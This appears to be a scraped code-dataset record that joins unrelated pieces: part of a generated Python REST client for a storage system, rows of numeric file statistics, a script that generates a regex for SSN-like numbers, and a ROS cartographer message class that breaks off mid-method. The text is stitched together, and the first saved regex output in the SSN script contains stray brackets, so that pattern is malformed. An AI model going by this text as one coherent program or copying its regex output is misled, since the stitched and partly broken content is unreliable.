>>> pprint(response)
>>>
>>> thread = api.symbol_export_volume_group(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A SYMbol VolumeGroupRef identifying the volume group to export. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get an HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_export_volume_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_export_volume_group`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_export_volume_group`")
resource_path = '/storage-systems/{system-id}/symbol/exportVolumeGroup'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_external_kms_re_key(self, system_id, body, **kwargs):
"""
Used to re-key the array with a new lock key.
Documented return codes: ok, externalKmsFailed, externalKmsNotEnabled, externalKmsNotCompliant, externalKmsTimeout.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_external_kms_re_key(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The wrapped pass phrase used to encrypt the lock key. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: WrappedLockKeyReturn
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get an HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_external_kms_re_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_external_kms_re_key`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_external_kms_re_key`")
resource_path = '/storage-systems/{system-id}/symbol/externalKMSReKey'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WrappedLockKeyReturn',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
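# --- Usage sketch (illustrative only, not part of the generated client) ---
# A minimal example of driving one of the symbol_* endpoints above, assuming an
# `api` instance of this client and the `system_id`/`body` values required by
# the chosen call. Synchronous calls block and return the decoded response;
# passing `callback=` makes the call asynchronous and returns the request
# thread instead, as described in each docstring.
#
#     from pprint import pprint
#
#     # synchronous: returns the decoded response body (a return-code string here)
#     result = api.symbol_export_volume_group(system_id, body)
#     pprint(result)
#
#     # asynchronous: the callback receives the response when it arrives
#     def callback_function(response):
#         pprint(response)
#
#     thread = api.symbol_export_volume_group(system_id, body, callback=callback_function)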
| 40.312867
| 853
| 0.544451
| 5,809
| 61,719
| 5.621622
| 0.082803
| 0.035277
| 0.029397
| 0.019108
| 0.822452
| 0.815868
| 0.805977
| 0.784144
| 0.772079
| 0.772079
| 0
| 0.001189
| 0.387028
| 61,719
| 1,530
| 854
| 40.339216
| 0.861969
| 0.345048
| 0
| 0.853088
| 0
| 0
| 0.20703
| 0.070269
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021703
| false
| 0
| 0.010017
| 0
| 0.053422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 |
22224e1cbba9cf55ec440b0af603fa6d6018322e | 7,603 | py | Python | regex_gen.py | jefflombard/regex | 834eebed5c1a819d9fe257c5fd83406e8c8c2ab4 | [ "MIT" ] | null | null | null |
regex_gen.py | jefflombard/regex | 834eebed5c1a819d9fe257c5fd83406e8c8c2ab4 | [ "MIT" ] | null | null | null |
regex_gen.py | jefflombard/regex | 834eebed5c1a819d9fe257c5fd83406e8c8c2ab4 | [ "MIT" ] | null | null | null |
# First 3 digits
first = ['00[1-9]','0[1-9][0-9]','[1-5][0-9][0-9]','6[0-5][0-9]','66[0-5]','66[7-9]','6[7-9][0-9]','[7-8][0-9][0-9]']
# /00[1-9]|
# 0[1-9][0-9]|
# [1-5][0-9][0-9]|
# 6[0-5][0-9]|
# 66[0-5]|
# 66[7-9]|
# 6[7-9][0-9]|
# [7-8][0-9][0-9]/
# Middle 2 digits
middle = ['[0-9][1-9]','[1-9][0-9]']
# [0-9][1-9]
# [1-9][0-9]
# Last 4 Digits
last = ['[0-9][0-9][0-9][1-9]','[0-9][0-9][1-9][0-9]','[0-9][1-9][0-9][0-9]','[1-9][0-9][0-9][0-9]']
# [0-9][0-9][0-9][1-9]
# [0-9][0-9][1-9][0-9]
# [0-9][1-9][0-9][0-9]
# [1-9][0-9][0-9][0-9]
# Regex expression to handle dashes
dash = r"\-?"  # raw string so the "\-" escape reaches the regex engine verbatim
# Matches 'x' only if 'x' is followed by 'y'
# x(?=y)
for a in first:
for b in middle:
for c in last:
print(a+'(?='+dash+b+'(?='+dash+c+')'+')'+'|')
"""
00[1-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|00[1-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|00[1-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|00[1-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|00[1-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|00[1-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|00[1-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|00[1-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|0[1-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|0[1-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|0[1-9][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|0[1-9][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|0[1-9][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|0[1-9][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|0[1-9][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|0[1-9][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|[1-5][0-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|[1-5][0-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|[1-5][0-9][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|[1-5][0-9][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|[1-5][0-9][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|[1-5][0-9][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|[1-5][0-9][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|[1-5][0-9][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|6[0-5][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|6[0-5][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|6[0-5][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|6[0-5][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|6[0-5][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|6[0-5][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|6[0-5][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|6[0-5][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|66[0-5](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|66[0-5](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|66[0-5](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|66[0-5](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|66[0-5](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|66[0-5](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|66[0-5](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|66[0-5](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|66[7-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|66[7-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|66[7-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|66[7-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|66[7-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|66[7-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|66[7-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|66[7-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|6[7-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|6[7-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|6[7-9][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|6[7-9][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|6[7-9][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|6[7-9][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|6[7-9][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|6[7-9][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|[7-8][0-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][0-9][1-9]))|[7-8][0-9][0-9](?=[0-9][1-9]](?=[0-9][0-9][1-9][0-9]))|[7-8][0-9][0-9](?=[0-9][1-9]](?=[0-9][1-9][0-9][0-9]))|[7-8][0-9][0-9](?=[0-9][1-9]](?=[1-9][0-9][0-9][0-9]))|[7-8][0-9][0-9](?=[1-9][0-9](?=[0-9][0-9][0-9][1-9]))|[7-8][0-9][0-9](?=[1-9][0-9](?=[0-9][0-9][1-9][0-9]))|[7-8][0-9][0-9](?=[1-9][0-9](?=[0-9][1-9][0-9][0-9]))|[7-8][0-9][0-9](?=[1-9][0-9](?=[1-9][0-9][0-9][0-9]))|
"""
"""
00[1-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|00[1-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|00[1-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|00[1-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|00[1-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|00[1-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|00[1-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|00[1-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|0[1-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|0[1-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|0[1-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|0[1-9][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|0[1-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|0[1-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|0[1-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|0[1-9][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|[1-5][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|[1-5][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|[1-5][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|[1-5][0-9][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|[1-5][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|[1-5][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|[1-5][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|[1-5][0-9][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|6[0-5][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|6[0-5][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|6[0-5][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|6[0-5][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|6[0-5][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|6[0-5][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|6[0-5][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|6[0-5][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|66[0-5](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|66[0-5](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|66[0-5](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|66[0-5](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|66[0-5](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|66[0-5](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|66[0-5](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|66[0-5](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|66[7-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|66[7-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|66[7-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|66[7-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|66[7-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|66[7-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|66[7-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|66[7-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|6[7-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|6[7-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|6[7-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|6[7-9][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|6[7-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|6[7-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|6[7-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|6[7-9][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|[7-8][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][0-9][1-9]))|[7-8][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][0-9][1-9][0-9]))|[7-8][0-9][0-9](?=\-?[0-9][1-9](?=\-?[0-9][1-9][0-9][0-9]))|[7-8][0-9][0-9](?=\-?[0-9][1-9](?=\-?[1-9][0-9][0-9][0-9]))|[7-8][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][0-9][1-9]))|[7-8][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][0-9][1-9][0-9]))|[7-8][0-9][0-9](?=\-?[1-9][0-9](?=\-?[0-9][1-9][0-9][0-9]))|[7-8][0-9][0-9](?=\-?[1-9][0-9](?=\-?[1-9][0-9][0-9][0-9]))|
"""
| 158.395833
| 3,552
| 0.326319
| 2,311
| 7,603
| 1.073561
| 0.015578
| 0.53688
| 0.727932
| 0.535268
| 0.934301
| 0.934301
| 0.934301
| 0.934301
| 0.934301
| 0.934301
| 0
| 0.312761
| 0.023938
| 7,603
| 47
| 3,553
| 161.765957
| 0.02156
| 0.044062
| 0
| 0
| 0
| 0
| 0.409186
| 0
| 0.125
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 14 |
22344d6d72ddb578754cdeae9703e2aa3af60dda | 26,851 | py | Python | Rover/install_isolated/lib/python2.7/dist-packages/cartographer_ros_msgs/srv/_StartTrajectory.py | Rose-Hulman-Rover-Team/Rover-2019-2020 | d75a9086fa733f8a8b5240005bee058737ad82c7 | [ "MIT" ] | 1 | 2018-10-04T14:37:00.000Z | 2018-10-04T14:37:00.000Z |
TrekBot_WS/install_isolated/lib/python2.7/dist-packages/cartographer_ros_msgs/srv/_StartTrajectory.py | Rafcin/TrekBot | d3dc63e6c16a040b16170f143556ef358018b7da | [ "Unlicense" ] | null | null | null |
TrekBot_WS/install_isolated/lib/python2.7/dist-packages/cartographer_ros_msgs/srv/_StartTrajectory.py | Rafcin/TrekBot | d3dc63e6c16a040b16170f143556ef358018b7da | [ "Unlicense" ] | null | null | null |
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from cartographer_ros_msgs/StartTrajectoryRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import cartographer_ros_msgs.msg
class StartTrajectoryRequest(genpy.Message):
_md5sum = "0780da312468afe59b45454db35b17ed"
_type = "cartographer_ros_msgs/StartTrajectoryRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
cartographer_ros_msgs/TrajectoryOptions options
cartographer_ros_msgs/SensorTopics topics
================================================================================
MSG: cartographer_ros_msgs/TrajectoryOptions
# Copyright 2016 The Cartographer Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
string tracking_frame
string published_frame
string odom_frame
bool provide_odom_frame
bool use_odometry
bool use_nav_sat
bool use_landmarks
bool publish_frame_projected_to_2d
int32 num_laser_scans
int32 num_multi_echo_laser_scans
int32 num_subdivisions_per_laser_scan
int32 num_point_clouds
float64 rangefinder_sampling_ratio
float64 odometry_sampling_ratio
float64 fixed_frame_pose_sampling_ratio
float64 imu_sampling_ratio
float64 landmarks_sampling_ratio
# This is a binary-encoded
# 'cartographer.mapping.proto.TrajectoryBuilderOptions' proto.
string trajectory_builder_options_proto
================================================================================
MSG: cartographer_ros_msgs/SensorTopics
# Copyright 2016 The Cartographer Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
string laser_scan_topic
string multi_echo_laser_scan_topic
string point_cloud2_topic
string imu_topic
string odometry_topic
string nav_sat_fix_topic
string landmark_topic
"""
__slots__ = ['options','topics']
_slot_types = ['cartographer_ros_msgs/TrajectoryOptions','cartographer_ros_msgs/SensorTopics']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommended
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
options,topics
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(StartTrajectoryRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.options is None:
self.options = cartographer_ros_msgs.msg.TrajectoryOptions()
if self.topics is None:
self.topics = cartographer_ros_msgs.msg.SensorTopics()
else:
self.options = cartographer_ros_msgs.msg.TrajectoryOptions()
self.topics = cartographer_ros_msgs.msg.SensorTopics()
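# Illustrative construction sketch (not part of the generated message class):
# the constructor docstring above recommends keyword arguments, e.g.
#
#     req = StartTrajectoryRequest(
#         options=cartographer_ros_msgs.msg.TrajectoryOptions(tracking_frame='base_link'),
#         topics=cartographer_ros_msgs.msg.SensorTopics(laser_scan_topic='/scan'))
#
# The values 'base_link' and '/scan' are example placeholders; unset fields
# keep the genpy defaults assigned above.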
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.options.tracking_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.options.published_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.options.odom_frame
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_5B4i5d().pack(_x.options.provide_odom_frame, _x.options.use_odometry, _x.options.use_nav_sat, _x.options.use_landmarks, _x.options.publish_frame_projected_to_2d, _x.options.num_laser_scans, _x.options.num_multi_echo_laser_scans, _x.options.num_subdivisions_per_laser_scan, _x.options.num_point_clouds, _x.options.rangefinder_sampling_ratio, _x.options.odometry_sampling_ratio, _x.options.fixed_frame_pose_sampling_ratio, _x.options.imu_sampling_ratio, _x.options.landmarks_sampling_ratio))
_x = self.options.trajectory_builder_options_proto
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.laser_scan_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.multi_echo_laser_scan_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.point_cloud2_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.imu_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.odometry_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.nav_sat_fix_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self.topics.landmark_topic
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.options is None:
self.options = cartographer_ros_msgs.msg.TrajectoryOptions()
if self.topics is None:
self.topics = cartographer_ros_msgs.msg.SensorTopics()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.tracking_frame = str[start:end].decode('utf-8')
else:
self.options.tracking_frame = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.published_frame = str[start:end].decode('utf-8')
else:
self.options.published_frame = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.odom_frame = str[start:end].decode('utf-8')
else:
self.options.odom_frame = str[start:end]
_x = self
start = end
end += 61
(_x.options.provide_odom_frame, _x.options.use_odometry, _x.options.use_nav_sat, _x.options.use_landmarks, _x.options.publish_frame_projected_to_2d, _x.options.num_laser_scans, _x.options.num_multi_echo_laser_scans, _x.options.num_subdivisions_per_laser_scan, _x.options.num_point_clouds, _x.options.rangefinder_sampling_ratio, _x.options.odometry_sampling_ratio, _x.options.fixed_frame_pose_sampling_ratio, _x.options.imu_sampling_ratio, _x.options.landmarks_sampling_ratio,) = _get_struct_5B4i5d().unpack(str[start:end])
self.options.provide_odom_frame = bool(self.options.provide_odom_frame)
self.options.use_odometry = bool(self.options.use_odometry)
self.options.use_nav_sat = bool(self.options.use_nav_sat)
self.options.use_landmarks = bool(self.options.use_landmarks)
self.options.publish_frame_projected_to_2d = bool(self.options.publish_frame_projected_to_2d)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.options.trajectory_builder_options_proto = str[start:end].decode('utf-8')
else:
self.options.trajectory_builder_options_proto = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.laser_scan_topic = str[start:end].decode('utf-8')
else:
self.topics.laser_scan_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.multi_echo_laser_scan_topic = str[start:end].decode('utf-8')
else:
self.topics.multi_echo_laser_scan_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.point_cloud2_topic = str[start:end].decode('utf-8')
else:
self.topics.point_cloud2_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.imu_topic = str[start:end].decode('utf-8')
else:
self.topics.imu_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.odometry_topic = str[start:end].decode('utf-8')
else:
self.topics.odometry_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.nav_sat_fix_topic = str[start:end].decode('utf-8')
else:
self.topics.nav_sat_fix_topic = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topics.landmark_topic = str[start:end].decode('utf-8')
else:
self.topics.landmark_topic = str[start:end]
return self
except struct.error as e:
